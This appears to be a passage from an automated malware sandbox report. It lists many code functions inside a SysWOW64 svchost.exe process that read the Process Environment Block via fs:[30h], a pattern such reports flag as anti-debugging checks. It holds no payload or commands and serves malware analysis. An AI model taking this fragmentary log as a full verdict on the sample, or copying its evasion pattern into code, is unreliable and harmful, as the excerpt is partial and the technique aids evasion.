Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_033DE10E mov ecx, dword ptr fs:[00000030h]	2_2_033DE10E
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0332C156 mov eax, dword ptr fs:[00000030h]	2_2_0332C156
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_033C8158 mov eax, dword ptr fs:[00000030h]	2_2_033C8158
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03336154 mov eax, dword ptr fs:[00000030h]	2_2_03336154
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03336154 mov eax, dword ptr fs:[00000030h]	2_2_03336154
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_033C4144 mov eax, dword ptr fs:[00000030h]	2_2_033C4144
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_033C4144 mov eax, dword ptr fs:[00000030h]	2_2_033C4144
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_033C4144 mov ecx, dword ptr fs:[00000030h]	2_2_033C4144
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_033C4144 mov eax, dword ptr fs:[00000030h]	2_2_033C4144
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_033C4144 mov eax, dword ptr fs:[00000030h]	2_2_033C4144
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_033B019F mov eax, dword ptr fs:[00000030h]	2_2_033B019F
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_033B019F mov eax, dword ptr fs:[00000030h]	2_2_033B019F
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_033B019F mov eax, dword ptr fs:[00000030h]	2_2_033B019F
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_033B019F mov eax, dword ptr fs:[00000030h]	2_2_033B019F
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0332A197 mov eax, dword ptr fs:[00000030h]	2_2_0332A197
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0332A197 mov eax, dword ptr fs:[00000030h]	2_2_0332A197
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0332A197 mov eax, dword ptr fs:[00000030h]	2_2_0332A197
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_034061E5 mov eax, dword ptr fs:[00000030h]	2_2_034061E5
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03370185 mov eax, dword ptr fs:[00000030h]	2_2_03370185
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_033EC188 mov eax, dword ptr fs:[00000030h]	2_2_033EC188
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_033EC188 mov eax, dword ptr fs:[00000030h]	2_2_033EC188
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_033D4180 mov eax, dword ptr fs:[00000030h]	2_2_033D4180
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_033D4180 mov eax, dword ptr fs:[00000030h]	2_2_033D4180
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_033601F8 mov eax, dword ptr fs:[00000030h]	2_2_033601F8
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_033AE1D0 mov eax, dword ptr fs:[00000030h]	2_2_033AE1D0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_033AE1D0 mov eax, dword ptr fs:[00000030h]	2_2_033AE1D0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_033AE1D0 mov ecx, dword ptr fs:[00000030h]	2_2_033AE1D0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_033AE1D0 mov eax, dword ptr fs:[00000030h]	2_2_033AE1D0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_033AE1D0 mov eax, dword ptr fs:[00000030h]	2_2_033AE1D0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_033F61C3 mov eax, dword ptr fs:[00000030h]	2_2_033F61C3
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_033F61C3 mov eax, dword ptr fs:[00000030h]	2_2_033F61C3
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_033C6030 mov eax, dword ptr fs:[00000030h]	2_2_033C6030
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0332A020 mov eax, dword ptr fs:[00000030h]	2_2_0332A020
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0332C020 mov eax, dword ptr fs:[00000030h]	2_2_0332C020
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0334E016 mov eax, dword ptr fs:[00000030h]	2_2_0334E016
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0334E016 mov eax, dword ptr fs:[00000030h]	2_2_0334E016
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0334E016 mov eax, dword ptr fs:[00000030h]	2_2_0334E016
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0334E016 mov eax, dword ptr fs:[00000030h]	2_2_0334E016
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_033B4000 mov ecx, dword ptr fs:[00000030h]	2_2_033B4000
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_033D2000 mov eax, dword ptr fs:[00000030h]	2_2_033D2000
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_033D2000 mov eax, dword ptr fs:[00000030h]	2_2_033D2000
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_033D2000 mov eax, dword ptr fs:[00000030h]	2_2_033D2000
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_033D2000 mov eax, dword ptr fs:[00000030h]	2_2_033D2000
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_033D2000 mov eax, dword ptr fs:[00000030h]	2_2_033D2000
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_033D2000 mov eax, dword ptr fs:[00000030h]	2_2_033D2000
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_033D2000 mov eax, dword ptr fs:[00000030h]	2_2_033D2000
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_033D2000 mov eax, dword ptr fs:[00000030h]	2_2_033D2000
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0335C073 mov eax, dword ptr fs:[00000030h]	2_2_0335C073
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03332050 mov eax, dword ptr fs:[00000030h]	2_2_03332050
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_033B6050 mov eax, dword ptr fs:[00000030h]	2_2_033B6050
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_033F60B8 mov eax, dword ptr fs:[00000030h]	2_2_033F60B8
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_033F60B8 mov ecx, dword ptr fs:[00000030h]	2_2_033F60B8
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_033280A0 mov eax, dword ptr fs:[00000030h]	2_2_033280A0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_033C80A8 mov eax, dword ptr fs:[00000030h]	2_2_033C80A8
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0333208A mov eax, dword ptr fs:[00000030h]	2_2_0333208A
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0332C0F0 mov eax, dword ptr fs:[00000030h]	2_2_0332C0F0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_033720F0 mov ecx, dword ptr fs:[00000030h]	2_2_033720F0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0332A0E3 mov ecx, dword ptr fs:[00000030h]	2_2_0332A0E3
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_033380E9 mov eax, dword ptr fs:[00000030h]	2_2_033380E9
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_033B60E0 mov eax, dword ptr fs:[00000030h]	2_2_033B60E0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_033B20DE mov eax, dword ptr fs:[00000030h]	2_2_033B20DE
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0336273C mov eax, dword ptr fs:[00000030h]	2_2_0336273C
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0336273C mov ecx, dword ptr fs:[00000030h]	2_2_0336273C
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0336273C mov eax, dword ptr fs:[00000030h]	2_2_0336273C
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_033AC730 mov eax, dword ptr fs:[00000030h]	2_2_033AC730
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0336C720 mov eax, dword ptr fs:[00000030h]	2_2_0336C720
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0336C720 mov eax, dword ptr fs:[00000030h]	2_2_0336C720
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03330710 mov eax, dword ptr fs:[00000030h]	2_2_03330710
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03360710 mov eax, dword ptr fs:[00000030h]	2_2_03360710
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0336C700 mov eax, dword ptr fs:[00000030h]	2_2_0336C700
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03338770 mov eax, dword ptr fs:[00000030h]	2_2_03338770
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03340770 mov eax, dword ptr fs:[00000030h]	2_2_03340770
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03340770 mov eax, dword ptr fs:[00000030h]	2_2_03340770
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03340770 mov eax, dword ptr fs:[00000030h]	2_2_03340770
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03340770 mov eax, dword ptr fs:[00000030h]	2_2_03340770
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03340770 mov eax, dword ptr fs:[00000030h]	2_2_03340770
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03340770 mov eax, dword ptr fs:[00000030h]	2_2_03340770
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03340770 mov eax, dword ptr fs:[00000030h]	2_2_03340770
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03340770 mov eax, dword ptr fs:[00000030h]	2_2_03340770
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03340770 mov eax, dword ptr fs:[00000030h]	2_2_03340770
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03340770 mov eax, dword ptr fs:[00000030h]	2_2_03340770
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03340770 mov eax, dword ptr fs:[00000030h]	2_2_03340770
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03340770 mov eax, dword ptr fs:[00000030h]	2_2_03340770
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03330750 mov eax, dword ptr fs:[00000030h]	2_2_03330750
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_033BE75D mov eax, dword ptr fs:[00000030h]	2_2_033BE75D
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03372750 mov eax, dword ptr fs:[00000030h]	2_2_03372750
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03372750 mov eax, dword ptr fs:[00000030h]	2_2_03372750
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_033B4755 mov eax, dword ptr fs:[00000030h]	2_2_033B4755
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0336674D mov esi, dword ptr fs:[00000030h]	2_2_0336674D
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0336674D mov eax, dword ptr fs:[00000030h]	2_2_0336674D
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0336674D mov eax, dword ptr fs:[00000030h]	2_2_0336674D
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_033307AF mov eax, dword ptr fs:[00000030h]	2_2_033307AF
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_033E47A0 mov eax, dword ptr fs:[00000030h]	2_2_033E47A0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_033D678E mov eax, dword ptr fs:[00000030h]	2_2_033D678E
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_033347FB mov eax, dword ptr fs:[00000030h]	2_2_033347FB
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_033347FB mov eax, dword ptr fs:[00000030h]	2_2_033347FB
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_033527ED mov eax, dword ptr fs:[00000030h]	2_2_033527ED
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_033527ED mov eax, dword ptr fs:[00000030h]	2_2_033527ED
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_033527ED mov eax, dword ptr fs:[00000030h]	2_2_033527ED
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_033BE7E1 mov eax, dword ptr fs:[00000030h]	2_2_033BE7E1
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0333C7C0 mov eax, dword ptr fs:[00000030h]	2_2_0333C7C0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_033B07C3 mov eax, dword ptr fs:[00000030h]	2_2_033B07C3
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0334E627 mov eax, dword ptr fs:[00000030h]	2_2_0334E627
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03366620 mov eax, dword ptr fs:[00000030h]	2_2_03366620
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03368620 mov eax, dword ptr fs:[00000030h]	2_2_03368620
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0333262C mov eax, dword ptr fs:[00000030h]	2_2_0333262C
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03372619 mov eax, dword ptr fs:[00000030h]	2_2_03372619
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_033AE609 mov eax, dword ptr fs:[00000030h]	2_2_033AE609
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0334260B mov eax, dword ptr fs:[00000030h]	2_2_0334260B
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0334260B mov eax, dword ptr fs:[00000030h]	2_2_0334260B
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0334260B mov eax, dword ptr fs:[00000030h]	2_2_0334260B
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0334260B mov eax, dword ptr fs:[00000030h]	2_2_0334260B
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0334260B mov eax, dword ptr fs:[00000030h]	2_2_0334260B
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0334260B mov eax, dword ptr fs:[00000030h]	2_2_0334260B
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0334260B mov eax, dword ptr fs:[00000030h]	2_2_0334260B
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03362674 mov eax, dword ptr fs:[00000030h]	2_2_03362674
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_033F866E mov eax, dword ptr fs:[00000030h]	2_2_033F866E
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_033F866E mov eax, dword ptr fs:[00000030h]	2_2_033F866E
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0336A660 mov eax, dword ptr fs:[00000030h]	2_2_0336A660
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0336A660 mov eax, dword ptr fs:[00000030h]	2_2_0336A660
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0334C640 mov eax, dword ptr fs:[00000030h]	2_2_0334C640
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_033666B0 mov eax, dword ptr fs:[00000030h]	2_2_033666B0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0336C6A6 mov eax, dword ptr fs:[00000030h]	2_2_0336C6A6
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03334690 mov eax, dword ptr fs:[00000030h]	2_2_03334690
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03334690 mov eax, dword ptr fs:[00000030h]	2_2_03334690
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_033AE6F2 mov eax, dword ptr fs:[00000030h]	2_2_033AE6F2
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_033AE6F2 mov eax, dword ptr fs:[00000030h]	2_2_033AE6F2
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_033AE6F2 mov eax, dword ptr fs:[00000030h]	2_2_033AE6F2
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_033AE6F2 mov eax, dword ptr fs:[00000030h]	2_2_033AE6F2
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_033B06F1 mov eax, dword ptr fs:[00000030h]	2_2_033B06F1
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_033B06F1 mov eax, dword ptr fs:[00000030h]	2_2_033B06F1
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0336A6C7 mov ebx, dword ptr fs:[00000030h]	2_2_0336A6C7
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0336A6C7 mov eax, dword ptr fs:[00000030h]	2_2_0336A6C7
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03340535 mov eax, dword ptr fs:[00000030h]	2_2_03340535
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03340535 mov eax, dword ptr fs:[00000030h]	2_2_03340535
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03340535 mov eax, dword ptr fs:[00000030h]	2_2_03340535
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03340535 mov eax, dword ptr fs:[00000030h]	2_2_03340535
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03340535 mov eax, dword ptr fs:[00000030h]	2_2_03340535
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03340535 mov eax, dword ptr fs:[00000030h]	2_2_03340535
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0335E53E mov eax, dword ptr fs:[00000030h]	2_2_0335E53E
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0335E53E mov eax, dword ptr fs:[00000030h]	2_2_0335E53E
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0335E53E mov eax, dword ptr fs:[00000030h]	2_2_0335E53E
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0335E53E mov eax, dword ptr fs:[00000030h]	2_2_0335E53E
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0335E53E mov eax, dword ptr fs:[00000030h]	2_2_0335E53E
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_033C6500 mov eax, dword ptr fs:[00000030h]	2_2_033C6500
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03404500 mov eax, dword ptr fs:[00000030h]	2_2_03404500
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03404500 mov eax, dword ptr fs:[00000030h]	2_2_03404500
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03404500 mov eax, dword ptr fs:[00000030h]	2_2_03404500
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03404500 mov eax, dword ptr fs:[00000030h]	2_2_03404500
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03404500 mov eax, dword ptr fs:[00000030h]	2_2_03404500
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03404500 mov eax, dword ptr fs:[00000030h]	2_2_03404500
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03404500 mov eax, dword ptr fs:[00000030h]	2_2_03404500
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0336656A mov eax, dword ptr fs:[00000030h]	2_2_0336656A
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0336656A mov eax, dword ptr fs:[00000030h]	2_2_0336656A
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0336656A mov eax, dword ptr fs:[00000030h]	2_2_0336656A
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03338550 mov eax, dword ptr fs:[00000030h]	2_2_03338550
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03338550 mov eax, dword ptr fs:[00000030h]	2_2_03338550
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_033545B1 mov eax, dword ptr fs:[00000030h]	2_2_033545B1
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_033545B1 mov eax, dword ptr fs:[00000030h]	2_2_033545B1
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_033B05A7 mov eax, dword ptr fs:[00000030h]	2_2_033B05A7
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_033B05A7 mov eax, dword ptr fs:[00000030h]	2_2_033B05A7
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_033B05A7 mov eax, dword ptr fs:[00000030h]	2_2_033B05A7
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0336E59C mov eax, dword ptr fs:[00000030h]	2_2_0336E59C
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03332582 mov eax, dword ptr fs:[00000030h]	2_2_03332582
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03332582 mov ecx, dword ptr fs:[00000030h]	2_2_03332582
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03364588 mov eax, dword ptr fs:[00000030h]	2_2_03364588
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0335E5E7 mov eax, dword ptr fs:[00000030h]	2_2_0335E5E7
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0335E5E7 mov eax, dword ptr fs:[00000030h]	2_2_0335E5E7
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0335E5E7 mov eax, dword ptr fs:[00000030h]	2_2_0335E5E7
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0335E5E7 mov eax, dword ptr fs:[00000030h]	2_2_0335E5E7
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0335E5E7 mov eax, dword ptr fs:[00000030h]	2_2_0335E5E7
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0335E5E7 mov eax, dword ptr fs:[00000030h]	2_2_0335E5E7
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0335E5E7 mov eax, dword ptr fs:[00000030h]	2_2_0335E5E7
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0335E5E7 mov eax, dword ptr fs:[00000030h]	2_2_0335E5E7
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_033325E0 mov eax, dword ptr fs:[00000030h]	2_2_033325E0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0336C5ED mov eax, dword ptr fs:[00000030h]	2_2_0336C5ED
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0336C5ED mov eax, dword ptr fs:[00000030h]	2_2_0336C5ED
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_033365D0 mov eax, dword ptr fs:[00000030h]	2_2_033365D0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0336A5D0 mov eax, dword ptr fs:[00000030h]	2_2_0336A5D0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0336A5D0 mov eax, dword ptr fs:[00000030h]	2_2_0336A5D0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0336E5CF mov eax, dword ptr fs:[00000030h]	2_2_0336E5CF
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0336E5CF mov eax, dword ptr fs:[00000030h]	2_2_0336E5CF
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0336A430 mov eax, dword ptr fs:[00000030h]	2_2_0336A430
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0332E420 mov eax, dword ptr fs:[00000030h]	2_2_0332E420
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0332E420 mov eax, dword ptr fs:[00000030h]	2_2_0332E420
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0332E420 mov eax, dword ptr fs:[00000030h]	2_2_0332E420
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0332C427 mov eax, dword ptr fs:[00000030h]	2_2_0332C427
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_033B6420 mov eax, dword ptr fs:[00000030h]	2_2_033B6420
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_033B6420 mov eax, dword ptr fs:[00000030h]	2_2_033B6420
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_033B6420 mov eax, dword ptr fs:[00000030h]	2_2_033B6420
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_033B6420 mov eax, dword ptr fs:[00000030h]	2_2_033B6420
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_033B6420 mov eax, dword ptr fs:[00000030h]	2_2_033B6420
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_033B6420 mov eax, dword ptr fs:[00000030h]	2_2_033B6420
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_033B6420 mov eax, dword ptr fs:[00000030h]	2_2_033B6420
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03368402 mov eax, dword ptr fs:[00000030h]	2_2_03368402
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03368402 mov eax, dword ptr fs:[00000030h]	2_2_03368402
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03368402 mov eax, dword ptr fs:[00000030h]	2_2_03368402
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0335A470 mov eax, dword ptr fs:[00000030h]	2_2_0335A470
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0335A470 mov eax, dword ptr fs:[00000030h]	2_2_0335A470
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0335A470 mov eax, dword ptr fs:[00000030h]	2_2_0335A470
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_033BC460 mov ecx, dword ptr fs:[00000030h]	2_2_033BC460
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_033EA456 mov eax, dword ptr fs:[00000030h]	2_2_033EA456
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0332645D mov eax, dword ptr fs:[00000030h]	2_2_0332645D
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0335245A mov eax, dword ptr fs:[00000030h]	2_2_0335245A
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0336E443 mov eax, dword ptr fs:[00000030h]	2_2_0336E443
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0336E443 mov eax, dword ptr fs:[00000030h]	2_2_0336E443
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0336E443 mov eax, dword ptr fs:[00000030h]	2_2_0336E443
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0336E443 mov eax, dword ptr fs:[00000030h]	2_2_0336E443
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0336E443 mov eax, dword ptr fs:[00000030h]	2_2_0336E443
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0336E443 mov eax, dword ptr fs:[00000030h]	2_2_0336E443
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0336E443 mov eax, dword ptr fs:[00000030h]	2_2_0336E443
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0336E443 mov eax, dword ptr fs:[00000030h]	2_2_0336E443
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_033644B0 mov ecx, dword ptr fs:[00000030h]	2_2_033644B0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_033BA4B0 mov eax, dword ptr fs:[00000030h]	2_2_033BA4B0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_033364AB mov eax, dword ptr fs:[00000030h]	2_2_033364AB
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_033EA49A mov eax, dword ptr fs:[00000030h]	2_2_033EA49A
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_033304E5 mov ecx, dword ptr fs:[00000030h]	2_2_033304E5
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0335EB20 mov eax, dword ptr fs:[00000030h]	2_2_0335EB20
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0335EB20 mov eax, dword ptr fs:[00000030h]	2_2_0335EB20
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_033F8B28 mov eax, dword ptr fs:[00000030h]	2_2_033F8B28
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_033F8B28 mov eax, dword ptr fs:[00000030h]	2_2_033F8B28
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03402B57 mov eax, dword ptr fs:[00000030h]	2_2_03402B57
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03402B57 mov eax, dword ptr fs:[00000030h]	2_2_03402B57
